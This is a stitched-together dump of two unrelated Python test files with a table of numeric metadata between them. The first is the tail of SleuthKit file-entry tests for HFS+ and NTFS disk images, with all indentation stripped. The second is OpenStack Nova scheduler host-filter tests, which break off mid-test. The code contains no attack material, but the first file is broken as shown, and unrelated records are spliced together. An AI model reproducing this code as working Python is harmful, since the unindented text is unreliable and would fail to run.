self.assertIsNotNone(linked_file_entry)
self.assertEqual(linked_file_entry.name, 'another_file')
def testGetParentFileEntry(self):
"""Tests the GetParentFileEntry function."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
parent_file_entry = file_entry.GetParentFileEntry()
self.assertIsNotNone(parent_file_entry)
self.assertEqual(parent_file_entry.name, 'a_directory')
def testGetStat(self):
"""Tests the GetStat function."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
stat_object = file_entry.GetStat()
self.assertIsNotNone(stat_object)
self.assertEqual(stat_object.type, stat_object.TYPE_FILE)
self.assertEqual(stat_object.size, 22)
self.assertEqual(stat_object.mode, 420)
self.assertEqual(stat_object.uid, 501)
self.assertEqual(stat_object.gid, 20)
self.assertEqual(stat_object.atime, 1596950907)
self.assertEqual(stat_object.atime_nano, 0)
self.assertEqual(stat_object.ctime, 1596950907)
self.assertEqual(stat_object.ctime_nano, 0)
self.assertEqual(stat_object.crtime, 1596950907)
self.assertEqual(stat_object.crtime_nano, 0)
self.assertEqual(stat_object.mtime, 1596950907)
self.assertEqual(stat_object.mtime_nano, 0)
# TODO: add tests for GetTSKFile
def testIsFunctions(self):
"""Tests the Is? functions."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertFalse(file_entry.IsRoot())
self.assertFalse(file_entry.IsVirtual())
self.assertTrue(file_entry.IsAllocated())
self.assertFalse(file_entry.IsDevice())
self.assertFalse(file_entry.IsDirectory())
self.assertTrue(file_entry.IsFile())
self.assertFalse(file_entry.IsLink())
self.assertFalse(file_entry.IsPipe())
self.assertFalse(file_entry.IsSocket())
test_location = '/a_directory'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_DIRECTORY, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertFalse(file_entry.IsRoot())
self.assertFalse(file_entry.IsVirtual())
self.assertTrue(file_entry.IsAllocated())
self.assertFalse(file_entry.IsDevice())
self.assertTrue(file_entry.IsDirectory())
self.assertFalse(file_entry.IsFile())
self.assertFalse(file_entry.IsLink())
self.assertFalse(file_entry.IsPipe())
self.assertFalse(file_entry.IsSocket())
path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertTrue(file_entry.IsRoot())
self.assertFalse(file_entry.IsVirtual())
self.assertTrue(file_entry.IsAllocated())
self.assertFalse(file_entry.IsDevice())
self.assertTrue(file_entry.IsDirectory())
self.assertFalse(file_entry.IsFile())
self.assertFalse(file_entry.IsLink())
self.assertFalse(file_entry.IsPipe())
self.assertFalse(file_entry.IsSocket())
def testSubFileEntries(self):
"""Tests the number_of_sub_file_entries and sub_file_entries properties."""
path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_sub_file_entries, 11)
expected_sub_file_entry_names = [
'$ExtentsFile',
'$CatalogFile',
'$BadBlockFile',
'$AllocationFile',
'$AttributesFile',
'.fseventsd',
'.HFS+ Private Directory Data\r',
'a_directory',
'a_link',
'passwords.txt',
'^^^^HFS+ Private Data']
sub_file_entry_names = []
for sub_file_entry in file_entry.sub_file_entries:
sub_file_entry_names.append(sub_file_entry.name)
self.assertEqual(
len(sub_file_entry_names), len(expected_sub_file_entry_names))
self.assertEqual(
sorted(sub_file_entry_names), sorted(expected_sub_file_entry_names))
# Test a path specification without a location.
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_DIRECTORY, parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_sub_file_entries, 2)
def testDataStreams(self):
"""Tests the data streams functionality."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_data_streams, 1)
data_stream_names = []
for data_stream in file_entry.data_streams:
data_stream_names.append(data_stream.name)
self.assertEqual(data_stream_names, [''])
test_location = '/a_directory'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_DIRECTORY, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_data_streams, 0)
data_stream_names = []
for data_stream in file_entry.data_streams:
data_stream_names.append(data_stream.name)
self.assertEqual(data_stream_names, [])
def testGetDataStream(self):
"""Tests the GetDataStream function."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
data_stream_name = ''
data_stream = file_entry.GetDataStream(data_stream_name)
self.assertIsNotNone(data_stream)
class TSKFileEntryTestNTFS(shared_test_lib.BaseTestCase):
"""Tests the SleuthKit (TSK) file entry on NTFS."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._resolver_context = context.Context()
test_file = self._GetTestFilePath(['vsstest.qcow2'])
self._SkipIfPathNotExists(test_file)
path_spec = os_path_spec.OSPathSpec(location=test_file)
self._qcow_path_spec = qcow_path_spec.QCOWPathSpec(parent=path_spec)
self._tsk_path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._qcow_path_spec)
self._file_system = tsk_file_system.TSKFileSystem(self._resolver_context)
self._file_system.Open(self._tsk_path_spec)
def tearDown(self):
"""Cleans up the needed objects used throughout the test."""
self._file_system.Close()
self._resolver_context.Empty()
# TODO: add tests for _GetAttributes
# TODO: add tests for _GetDataStreams
# TODO: add tests for _GetDirectory
# TODO: add tests for _GetLink
# TODO: add tests for _GetStat
# TODO: add tests for _GetSubFileEntries
# TODO: add tests for _GetTimeValue
# TODO: add tests for _TSKFileTimeCopyToStatTimeTuple
def testAccessTime(self):
"""Test the access_time property."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.access_time)
def testBackupTime(self):
"""Test the backup_time property."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNone(file_entry.backup_time)
def testChangeTime(self):
"""Test the change_time property."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.change_time)
def testCreationTime(self):
"""Test the creation_time property."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.creation_time)
def testDeletionTime(self):
"""Test the deletion_time property."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNone(file_entry.deletion_time)
def testModificationTime(self):
"""Test the modification_time property."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.modification_time)
def testName(self):
"""Test the name property."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.name, '{3808876b-c176-4e48-b7ae-04046e6cc752}')
def testSize(self):
"""Test the size property."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.size, 65536)
def testGetStat(self):
"""Tests the GetStat function."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
stat_object = file_entry.GetStat()
self.assertIsNotNone(stat_object)
self.assertEqual(stat_object.type, stat_object.TYPE_FILE)
self.assertEqual(stat_object.size, 65536)
self.assertEqual(stat_object.mode, 365)
self.assertEqual(stat_object.uid, 0)
self.assertEqual(stat_object.gid, 0)
self.assertEqual(stat_object.atime, 1386052509)
self.assertEqual(stat_object.atime_nano, 5023783)
self.assertEqual(stat_object.ctime, 1386052509)
self.assertEqual(stat_object.ctime_nano, 5179783)
self.assertEqual(stat_object.crtime, 1386052509)
self.assertEqual(stat_object.crtime_nano, 5023783)
self.assertEqual(stat_object.mtime, 1386052509)
self.assertEqual(stat_object.mtime_nano, 5179783)
def testAttributes(self):
"""Tests the number_of_attributes property."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_attributes, 4)
def testDataStream(self):
"""Tests the number_of_data_streams and data_streams properties."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_data_streams, 1)
data_stream_names = []
for data_stream in file_entry.data_streams:
data_stream_names.append(data_stream.name)
self.assertEqual(data_stream_names, [''])
path_spec = tsk_path_spec.TSKPathSpec(
inode=36, location='/System Volume Information',
parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_data_streams, 0)
data_stream_names = []
for data_stream in file_entry.data_streams:
data_stream_names.append(data_stream.name)
self.assertEqual(data_stream_names, [])
test_location = '/$Extend/$RmMetadata/$Repair'
path_spec = tsk_path_spec.TSKPathSpec(
inode=28, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_data_streams, 2)
data_stream_names = []
for data_stream in file_entry.data_streams:
data_stream_names.append(data_stream.name)
self.assertEqual(sorted(data_stream_names), sorted(['', '$Config']))
def testGetDataStream(self):
"""Tests the retrieve data stream functionality."""
test_location = (
'/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')
path_spec = tsk_path_spec.TSKPathSpec(
inode=38, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
data_stream_name = ''
data_stream = file_entry.GetDataStream(data_stream_name)
self.assertIsNotNone(data_stream)
self.assertEqual(data_stream.name, data_stream_name)
data_stream = file_entry.GetDataStream('bogus')
self.assertIsNone(data_stream)
test_location = '/$Extend/$RmMetadata/$Repair'
path_spec = tsk_path_spec.TSKPathSpec(
inode=28, location=test_location, parent=self._qcow_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
data_stream_name = '$Config'
data_stream = file_entry.GetDataStream(data_stream_name)
self.assertIsNotNone(data_stream)
self.assertEqual(data_stream.name, data_stream_name)
if __name__ == '__main__':
unittest.main()
| 36.290292
| 79
| 0.749351
| 4,743
| 38,504
| 5.719165
| 0.058613
| 0.090577
| 0.048404
| 0.070191
| 0.92804
| 0.900723
| 0.870714
| 0.864337
| 0.849923
| 0.847453
| 0
| 0.025036
| 0.154555
| 38,504
| 1,060
| 80
| 36.324528
| 0.808251
| 0.101132
| 0
| 0.848276
| 0
| 0
| 0.061219
| 0.039255
| 0
| 0
| 0.00146
| 0.000943
| 0.314483
| 1
| 0.084138
| false
| 0.002759
| 0.012414
| 0
| 0.111724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4bdf4d612382c722fa3389cba85d3514a9bcb8d
| 39,710
|
py
|
Python
|
nova/tests/scheduler/test_host_filters.py
|
781778304/nova
|
05aff1959c9f94dae095635133386418390efb37
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/scheduler/test_host_filters.py
|
781778304/nova
|
05aff1959c9f94dae095635133386418390efb37
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/scheduler/test_host_filters.py
|
781778304/nova
|
05aff1959c9f94dae095635133386418390efb37
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2011 OpenStack LLC. # All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Scheduler Host Filters.
"""
import httplib
import stubout
from nova import context
from nova import exception
from nova import flags
from nova.openstack.common import jsonutils
from nova.scheduler import filters
from nova.scheduler.filters.trusted_filter import AttestationService
from nova import test
from nova.tests.scheduler import fakes
from nova import utils
DATA = ''
def stub_out_https_backend(stubs):
"""
Stubs out the httplib.HTTPRequest.getresponse to return
faked-out data instead of grabbing actual contents of a resource
The stubbed getresponse() returns an iterator over
the data "I am a teapot, short and stout\n"
:param stubs: Set of stubout stubs
"""
class FakeHTTPResponse(object):
def read(self):
return DATA
def fake_do_request(self, *args, **kwargs):
return httplib.OK, FakeHTTPResponse()
stubs.Set(AttestationService, '_do_request', fake_do_request)
class TestFilter(filters.BaseHostFilter):
pass
class TestBogusFilter(object):
"""Class that doesn't inherit from BaseHostFilter"""
pass
class HostFiltersTestCase(test.TestCase):
"""Test case for host filters."""
def setUp(self):
super(HostFiltersTestCase, self).setUp()
self.stubs = stubout.StubOutForTesting()
stub_out_https_backend(self.stubs)
self.context = context.RequestContext('fake', 'fake')
self.json_query = jsonutils.dumps(
['and', ['>=', '$free_ram_mb', 1024],
['>=', '$free_disk_mb', 200 * 1024]])
# This has a side effect of testing 'get_filter_classes'
# when specifying a method (in this case, our standard filters)
classes = filters.get_filter_classes(
['nova.scheduler.filters.standard_filters'])
self.class_map = {}
for cls in classes:
self.class_map[cls.__name__] = cls
def test_get_filter_classes(self):
classes = filters.get_filter_classes(
['nova.tests.scheduler.test_host_filters.TestFilter'])
self.assertEqual(len(classes), 1)
self.assertEqual(classes[0].__name__, 'TestFilter')
# Test a specific class along with our standard filters
classes = filters.get_filter_classes(
['nova.tests.scheduler.test_host_filters.TestFilter',
'nova.scheduler.filters.standard_filters'])
self.assertEqual(len(classes), 1 + len(self.class_map))
def test_get_filter_classes_raises_on_invalid_classes(self):
self.assertRaises(ImportError,
filters.get_filter_classes,
['nova.tests.scheduler.test_host_filters.NoExist'])
self.assertRaises(exception.ClassNotFound,
filters.get_filter_classes,
['nova.tests.scheduler.test_host_filters.TestBogusFilter'])
def test_all_host_filter(self):
filt_cls = self.class_map['AllHostsFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(filt_cls.host_passes(host, {}))
def _stub_service_is_up(self, ret_value):
def fake_service_is_up(service):
return ret_value
self.stubs.Set(utils, 'service_is_up', fake_service_is_up)
def test_affinity_different_filter_passes(self):
filt_cls = self.class_map['DifferentHostFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
instance = fakes.FakeInstance(context=self.context,
params={'host': 'host2'})
instance_uuid = instance.uuid
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': {
'different_host': [instance_uuid], }}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_different_filter_no_list_passes(self):
filt_cls = self.class_map['DifferentHostFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
instance = fakes.FakeInstance(context=self.context,
params={'host': 'host2'})
instance_uuid = instance.uuid
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': {
'different_host': instance_uuid}}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_different_filter_fails(self):
filt_cls = self.class_map['DifferentHostFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
instance = fakes.FakeInstance(context=self.context,
params={'host': 'host1'})
instance_uuid = instance.uuid
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': {
'different_host': [instance_uuid], }}
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_affinity_different_filter_handles_none(self):
filt_cls = self.class_map['DifferentHostFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
instance = fakes.FakeInstance(context=self.context,
params={'host': 'host2'})
instance_uuid = instance.uuid
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': None}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_same_filter_no_list_passes(self):
filt_cls = self.class_map['SameHostFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
instance = fakes.FakeInstance(context=self.context,
params={'host': 'host1'})
instance_uuid = instance.uuid
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': {
'same_host': instance_uuid}}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_same_filter_passes(self):
filt_cls = self.class_map['SameHostFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
instance = fakes.FakeInstance(context=self.context,
params={'host': 'host1'})
instance_uuid = instance.uuid
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': {
'same_host': [instance_uuid], }}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_same_filter_fails(self):
filt_cls = self.class_map['SameHostFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
instance = fakes.FakeInstance(context=self.context,
params={'host': 'host2'})
instance_uuid = instance.uuid
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': {
'same_host': [instance_uuid], }}
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_affinity_same_filter_handles_none(self):
filt_cls = self.class_map['SameHostFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
instance = fakes.FakeInstance(context=self.context,
params={'host': 'host2'})
instance_uuid = instance.uuid
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': None}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_simple_cidr_filter_passes(self):
filt_cls = self.class_map['SimpleCIDRAffinityFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
host.capabilities = {'host_ip': '10.8.1.1'}
affinity_ip = "10.8.1.100"
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': {
'cidr': '/24',
'build_near_host_ip': affinity_ip}}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_simple_cidr_filter_fails(self):
filt_cls = self.class_map['SimpleCIDRAffinityFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
host.capabilities = {'host_ip': '10.8.1.1'}
affinity_ip = "10.8.1.100"
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': {
'cidr': '/32',
'build_near_host_ip': affinity_ip}}
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_affinity_simple_cidr_filter_handles_none(self):
filt_cls = self.class_map['SimpleCIDRAffinityFilter']()
host = fakes.FakeHostState('host1', 'compute', {})
affinity_ip = flags.FLAGS.my_ip.split('.')[0:3]
affinity_ip.append('100')
affinity_ip = str.join('.', affinity_ip)
filter_properties = {'context': self.context.elevated(),
'scheduler_hints': None}
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_passes(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['ComputeFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024}}
capabilities = {'enabled': True}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024, 'capabilities': capabilities,
'service': service})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_type_filter(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['TypeAffinityFilter']()
filter_properties = {'context': self.context,
'instance_type': {'id': 1}}
filter2_properties = {'context': self.context,
'instance_type': {'id': 2}}
capabilities = {'enabled': True}
service = {'disabled': False}
host = fakes.FakeHostState('fake_host', 'compute',
{'capabilities': capabilities,
'service': service})
#True since empty
self.assertTrue(filt_cls.host_passes(host, filter_properties))
fakes.FakeInstance(context=self.context,
params={'host': 'fake_host', 'instance_type_id': 1})
#True since same type
self.assertTrue(filt_cls.host_passes(host, filter_properties))
#False since different type
self.assertFalse(filt_cls.host_passes(host, filter2_properties))
#False since node not homogeneous
fakes.FakeInstance(context=self.context,
params={'host': 'fake_host', 'instance_type_id': 2})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_ram_filter_fails_on_memory(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['RamFilter']()
self.flags(ram_allocation_ratio=1.0)
filter_properties = {'instance_type': {'memory_mb': 1024}}
capabilities = {'enabled': True}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1023, 'total_usable_ram_mb': 1024,
'capabilities': capabilities, 'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_ram_filter_oversubscribe(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['RamFilter']()
self.flags(ram_allocation_ratio=2.0)
filter_properties = {'instance_type': {'memory_mb': 1024}}
capabilities = {'enabled': True}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': -1024, 'total_usable_ram_mb': 2048,
'capabilities': capabilities, 'service': service})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_fails_on_service_disabled(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['ComputeFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024}}
capabilities = {'enabled': True}
service = {'disabled': True}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024, 'capabilities': capabilities,
'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_fails_on_service_down(self):
self._stub_service_is_up(False)
filt_cls = self.class_map['ComputeFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024}}
capabilities = {'enabled': True}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024, 'capabilities': capabilities,
'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_fails_on_capability_disabled(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['ComputeFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024}}
capabilities = {'enabled': False}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024, 'capabilities': capabilities,
'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_passes_on_volume(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['ComputeFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024}}
capabilities = {'enabled': False}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'volume',
{'free_ram_mb': 1024, 'capabilities': capabilities,
'service': service})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_passes_on_no_instance_type(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['ComputeFilter']()
filter_properties = {}
capabilities = {'enabled': False}
service = {'disabled': False}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024, 'capabilities': capabilities,
'service': service})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_passes_extra_specs(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['ComputeCapabilitiesFilter']()
extra_specs = {'opt1': 1, 'opt2': 2}
capabilities = {'enabled': True, 'opt1': 1, 'opt2': 2}
service = {'disabled': False}
filter_properties = {'instance_type': {'memory_mb': 1024,
'extra_specs': extra_specs}}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024, 'capabilities': capabilities,
'service': service})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_fails_extra_specs(self):
self._stub_service_is_up(True)
filt_cls = self.class_map['ComputeCapabilitiesFilter']()
extra_specs = {'opt1': 1, 'opt2': 3}
capabilities = {'enabled': True, 'opt1': 1, 'opt2': 2}
service = {'disabled': False}
filter_properties = {'instance_type': {'memory_mb': 1024,
'extra_specs': extra_specs}}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024, 'capabilities': capabilities,
'service': service})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_isolated_hosts_fails_isolated_on_non_isolated(self):
self.flags(isolated_images=['isolated'], isolated_hosts=['isolated'])
filt_cls = self.class_map['IsolatedHostsFilter']()
filter_properties = {
'request_spec': {
'instance_properties': {'image_ref': 'isolated'}
}
}
host = fakes.FakeHostState('non-isolated', 'compute', {})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_isolated_hosts_fails_non_isolated_on_isolated(self):
self.flags(isolated_images=['isolated'], isolated_hosts=['isolated'])
filt_cls = self.class_map['IsolatedHostsFilter']()
filter_properties = {
'request_spec': {
'instance_properties': {'image_ref': 'non-isolated'}
}
}
host = fakes.FakeHostState('isolated', 'compute', {})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_isolated_hosts_passes_isolated_on_isolated(self):
self.flags(isolated_images=['isolated'], isolated_hosts=['isolated'])
filt_cls = self.class_map['IsolatedHostsFilter']()
filter_properties = {
'request_spec': {
'instance_properties': {'image_ref': 'isolated'}
}
}
host = fakes.FakeHostState('isolated', 'compute', {})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_isolated_hosts_passes_non_isolated_on_non_isolated(self):
self.flags(isolated_images=['isolated'], isolated_hosts=['isolated'])
filt_cls = self.class_map['IsolatedHostsFilter']()
filter_properties = {
'request_spec': {
'instance_properties': {'image_ref': 'non-isolated'}
}
}
host = fakes.FakeHostState('non-isolated', 'compute', {})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_json_filter_passes(self):
filt_cls = self.class_map['JsonFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024,
'root_gb': 200,
'ephemeral_gb': 0},
'scheduler_hints': {'query': self.json_query}}
capabilities = {'enabled': True}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1024,
'free_disk_mb': 200 * 1024,
'capabilities': capabilities})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_json_filter_passes_with_no_query(self):
filt_cls = self.class_map['JsonFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024,
'root_gb': 200,
'ephemeral_gb': 0}}
capabilities = {'enabled': True}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 0,
'free_disk_mb': 0,
'capabilities': capabilities})
self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_json_filter_fails_on_memory(self):
filt_cls = self.class_map['JsonFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024,
'root_gb': 200,
'ephemeral_gb': 0},
'scheduler_hints': {'query': self.json_query}}
capabilities = {'enabled': True}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': 1023,
'free_disk_mb': 200 * 1024,
'capabilities': capabilities})
self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_json_filter_fails_on_disk(self):
filt_cls = self.class_map['JsonFilter']()
filter_properties = {'instance_type': {'memory_mb': 1024,
'root_gb': 200,
